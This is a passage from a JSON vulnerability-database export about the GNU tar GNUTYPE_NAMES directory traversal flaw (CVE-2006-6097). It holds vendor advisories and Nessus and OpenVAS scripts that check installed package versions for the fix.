LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23759);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2013/06/21 23:52:42 $\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_bugtraq_id(21235);\n\n script_name(english:\"FreeBSD : gtar -- GNUTYPE_NAMES directory traversal vulnerability (3dd7eb58-80ae-11db-b4ec-000854d03344)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Teemu Salmela reports :\n\nThere is a tar record type, called GNUTYPE_NAMES (an obsolete GNU\nextension), that allows the creation of symbolic links pointing to\narbitrary locations in the filesystem, which makes it possible to\ncreate/overwrite arbitrary files.\"\n );\n # http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c3e93a3\"\n );\n # http://www.freebsd.org/ports/portaudit/3dd7eb58-80ae-11db-b4ec-000854d03344.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2ae060a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gtar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gtar<1.16_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-05-11T21:14:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "ia64", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "i386", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "x86_64", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "ppc", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "s390x", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-6.AS21.1", "arch": "i386", "packageName": "tar", "packageFilename": "tar-1.13.25-6.AS21.1.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-6.AS21.1", "arch": "ia64", "packageName": "tar", "packageFilename": "tar-1.13.25-6.AS21.1.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "x86_64", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "s390", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "ppc", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "s390x", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.13.25-15.RHEL3", "arch": "ia64", "packageName": "tar", "packageFilename": "tar-1.13.25-15.RHEL3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "i386", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.14-12.RHEL4", "arch": "s390", "packageName": "tar", "packageFilename": "tar-1.14-12.RHEL4.s390.rpm", "operator": "lt"}], "description": "The GNU tar program saves many files together in one archive and can\r\nrestore individual files (or all of the files) from that archive. \r\n\r\nTeemu Salmela discovered a path traversal flaw in the way GNU tar extracted\r\narchives. A malicious user could create a tar archive that could write to\r\narbitrary files to which the user running GNU tar has write access.\r\n(CVE-2006-6097)\r\n\r\nUsers of tar should upgrade to this updated package, which contains a\r\nreplacement backported patch to correct this issue.", "reporter": "RedHat", "published": "2006-12-19T05:00:00", "type": "redhat", "title": "(RHSA-2006:0749) Moderate: tar security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-11T23:26:56", "id": "RHSA-2006:0749", "href": "https://access.redhat.com/errata/RHSA-2006:0749", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:57", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-6097"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "tar - 1.15.1-2ubuntu0.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "tar - 1.15.1-2ubuntu2.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "tar - 1.15.91-2ubuntu0.3", "operator": "lt"}], "description": "Teemu Salmela discovered that tar still handled the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2006-11-27T00:00:00", "title": "tar vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-11-27T00:00:00", "id": "USN-385-1", "href": "https://usn.ubuntu.com/385-1/", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:45:59", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097", "https://bugs.gentoo.org/show_bug.cgi?id=155901"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.16-r2", "packageName": "app-arch/tar", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nThe Tar program provides the ability to create and manipulate tar archives. \n\n### Description\n\nTar does not properly extract archive elements using the GNUTYPE_NAMES record name, allowing files to be created at arbitrary locations using symlinks. Once a symlink is extracted, files after the symlink in the archive will be extracted to the destination of the symlink. \n\n### Impact\n\nAn attacker could entice a user to extract a specially crafted tar archive, possibly allowing for the overwriting of arbitrary files on the system extracting the archive. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Tar users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-arch/tar-1.16-r2\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2006-12-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "gentoo", "title": "Tar: Directory traversal vulnerability", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-11T00:00:00", "id": "GLSA-200612-10", "href": "https://security.gentoo.org/glsa/200612-10", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-08T11:44:20", "references": [], "pluginID": "57680", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:26.gtar.asc", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Security Advisory (FreeBSD-SA-06:26.gtar.asc)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57680", "id": "OPENVAS:57680", "sourceData": "#\n#ADV FreeBSD-SA-06:26.gtar.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#\n\ntag_insight = \"GNU tar (gtar) is a utility to create and extract tape archives,\ncommonly known as tar files. GNU tar is included in FreeBSD 4.x as\n/usr/bin/tar, and in FreeBSD 5.x as /usr/bin/gtar.\n\nSymlinks created using the GNUTYPE_NAMES tar extension can be\nabsolute due to lack of proper sanity checks.\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-06:26.gtar.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:26.gtar.asc\";\n\n \nif(description)\n{\n script_id(57680);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-06:26.gtar.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"5.5\", patchlevel:\"9\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"4.11\", patchlevel:\"26\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:42", "references": [], "pluginID": "57704", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-335-01.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Slackware Advisory SSA:2006-335-01 tar", "type": "openvas", "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57704", "id": "OPENVAS:57704", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_335_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New tar packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and 11.0 to fix a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-335-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-335-01\";\n \nif(description)\n{\n script_id(57704);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-335-01 tar \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:32", "references": [], "pluginID": "65492", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tar\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016710 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SLES9: Security update for tar", "type": "openvas", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65492", "id": "OPENVAS:65492", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016710.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for tar\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tar\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016710 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65492);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES9: Security update for tar\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"tar\", rpm:\"tar~1.13.25~325.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:10", "references": [], "pluginID": "57678", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Ports: gtar", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2016-09-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57678", "id": "OPENVAS:57678", "sourceData": "#\n#VID 3dd7eb58-80ae-11db-b4ec-000854d03344\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: gtar\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html\nhttp://www.vuxml.org/freebsd/3dd7eb58-80ae-11db-b4ec-000854d03344.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57678);\n script_version(\"$Revision: 4118 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-20 07:32:38 +0200 (Tue, 20 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-6097\");\n script_bugtraq_id(21235);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_name(\"FreeBSD Ports: gtar\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gtar\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.16_2\")<0) {\n txt += 'Package gtar version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:01:36", "references": [], "pluginID": "136141256231057704", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-335-01.", "edition": 3, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "title": "Slackware Advisory SSA:2006-335-01 tar", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231057704", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057704", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_335_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New tar packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and 11.0 to fix a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-335-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-335-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57704\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_version(\"$Revision: 9352 $\");\n name = \"Slackware Advisory SSA:2006-335-01 tar \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 